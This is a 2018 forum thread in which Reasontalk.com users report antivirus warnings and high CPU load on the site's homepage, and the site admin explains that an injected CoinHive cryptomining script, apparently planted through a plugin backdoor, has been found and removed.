Sophos Detecing Malware

List your suggestions here!
Forum rules
Keep in mind that this forum is for Reasontalk.com suggestions, and not for support on your Propellerheads software.
User avatar
DinoJ
Posts: 62
Joined: 22 Jan 2015
Location: UK

Post 28 Sep 2018

Hi,

Just wanted to mention that during the last week, whenever I go to the main Reasontalk page before going to the forum, my Sophos AntiVirus says it is blocking Malware (See screenshot). Not sure what this is, or if it a false positive but just in case thought I would bring this to your attention.

Kind Regards,

DinoJ
You do not have the required permissions to view the files attached to this post.

User avatar
Zac
Posts: 1102
Joined: 19 May 2016

Post 28 Oct 2018

I'm slightly surprised this hasnt been responded to... sophos is legit and well established.

Surely this guy deserves a reply...?

WongoTheSane
Posts: 1517
Joined: 14 Sep 2015
Location: Paris, France

Post 29 Oct 2018

It should be resolved by now:

viewtopic.php?p=415966#p415966

...but if you still find anything suspicious, please report, it helps!

User avatar
DinoJ
Posts: 62
Joined: 22 Jan 2015
Location: UK

Post 02 Nov 2018

@Zac Thanks for the bump! Yeah Sophos is the AV we use at my work and it is really good, I may have just jinxed myself by saying this but we had far less issues with viruses and malware in the last two years since we switched to this. Excluding the few users who insist on clicking links promising them tax refunds or opening attachments from people/organisations they don't know! But can't blame Sophos for not being able to protect against PEBCAK/PICNIC :lol:

@WongoTheSane Thanks for the response and update, I can confirm Sophos no longer grumbles when I visit your site :)

User avatar
DinoJ
Posts: 62
Joined: 22 Jan 2015
Location: UK

Post 19 Nov 2018

Just to report, the malware detection on Reasontalk main page has returned today, this time it also triggering Malwarebytes as well as Sophos (See Screenshot).

Reasontalk Malware.png
You do not have the required permissions to view the files attached to this post.

User avatar
rcbuse
Posts: 818
Joined: 16 Jan 2015
Location: SR388

Post 19 Nov 2018

Could be that the landing page is running bitcoin scripts from https://coinhive.com/. I'm seeing 100% cpu on all my cores when I load reasontalk.com

User avatar
Emian
Posts: 649
Joined: 16 Jan 2015

Post 20 Nov 2018

rcbuse wrote:
19 Nov 2018
Could be that the landing page is running bitcoin scripts from https://coinhive.com/. I'm seeing 100% cpu on all my cores when I load reasontalk.com
my virusscanner still blocks a coinhive site when comming here...


"i might be established, but i'll never be establishement "
- Dave Clarke -www.soundcloud.com/emian

User avatar
Zac
Posts: 1102
Joined: 19 May 2016

Post 20 Nov 2018

Should i worry about this? Is this an internal issue, i.e. put in place by the site owner or some external hack?

User avatar
Creativemind
Posts: 2441
Joined: 17 Jan 2015
Location: Stoke-On-Trent, England, UK

Post 20 Nov 2018

Yeah my Avast anti-virus is too.
You do not have the required permissions to view the files attached to this post.
Last edited by Creativemind on 20 Nov 2018, edited 2 times in total.
:reason:

Reason 10.2

User avatar
Adabler
Posts: 229
Joined: 05 Oct 2017
Location: Oslo

Post 20 Nov 2018

Strange. I am using firefox with tracking blocking, avast and adblock but I do not see any changes to cpu load when accessing reasontalk.com. I don't see exactly what adblock is blocking, could it be a dodgy ad causing this?
:reason: 10 on Win10

User avatar
avasopht
Posts: 1872
Joined: 16 Jan 2015

Post 20 Nov 2018

If you're not running regular (or even automatic) updates on forum and CMS you probably got hacked and had malware installed.

You might also want to double check the theme you've installed. Maybe that also opened a backdoor.
---

User avatar
MikeMcKew
Posts: 169
Joined: 16 Aug 2017
Location: Leesburg, VA

Post 20 Nov 2018

Thank you everyone, for bringing this to our attention. If anyone else has reports, please continue to post them here. We are looking into this issue and hope to resolve it as quickly as possible.
Subscribe to my YouTube channel for Reason and other audio production tutorials: YouTube Channel

User avatar
nickb523
Posts: 215
Joined: 23 Jan 2017
Location: Scotland

Post 20 Nov 2018

I'm seeing the same thing as Panda - pinned 100% cpu on the homepage.

A quick look at the homepage source code tells me that you have indeed been hacked. Something is going on with https://coinhive.com/.

I can sort this out so if you need assistance just give me a shout. :)

Nick

User avatar
Adabler
Posts: 229
Joined: 05 Oct 2017
Location: Oslo

Post 20 Nov 2018

nickb523 wrote:
20 Nov 2018
I'm seeing the same thing as Panda - pinned 100% cpu on the homepage.
A quick look at the homepage source code tells me that you have indeed been hacked. Something is going on with https://coinhive.com/.
Do you know why something like this only seem to affect some users? What would be considered good practice on our end?
:reason: 10 on Win10

User avatar
Kenni
Site Admin
Posts: 1191
Joined: 02 Jun 2015
Location: Copenhagen, Denmark

Post 21 Nov 2018

So again, the CoinHive hack hit us.

Basically, "someone" injects a single line of javascript into the theme code, loading a CoinHive miner in the background, thus using visitors CPU to crypto-mine for them (Monero) while the site is open.

It's important for me to stress that this doesn't infect visitors with a virus or anything of the sorts, it simply "just" calculates hashes while the site is open!

I've identified which plugin might have opened a backdoor, and cleared it of malicious code. The site doesn't have the CoinHive shortlink anymore and the issue should be resolved.

Please bump this thread and keep reporting if you see the issue coming back!
Kenni Andruszkow
SoundCloud

User avatar
Zac
Posts: 1102
Joined: 19 May 2016

Post 22 Nov 2018

Kenni wrote:
21 Nov 2018
So again, the CoinHive hack hit us.

Basically, "someone" injects a single line of javascript into the theme code, loading a CoinHive miner in the background, thus using visitors CPU to crypto-mine for them (Monero) while the site is open.

It's important for me to stress that this doesn't infect visitors with a virus or anything of the sorts, it simply "just" calculates hashes while the site is open!

I've identified which plugin might have opened a backdoor, and cleared it of malicious code. The site doesn't have the CoinHive shortlink anymore and the issue should be resolved.

Please bump this thread and keep reporting if you see the issue coming back!
Thanks for the fix.

  • Information
  • Who is online

    Users browsing this forum: CommonCrawl [Bot] and 0 guests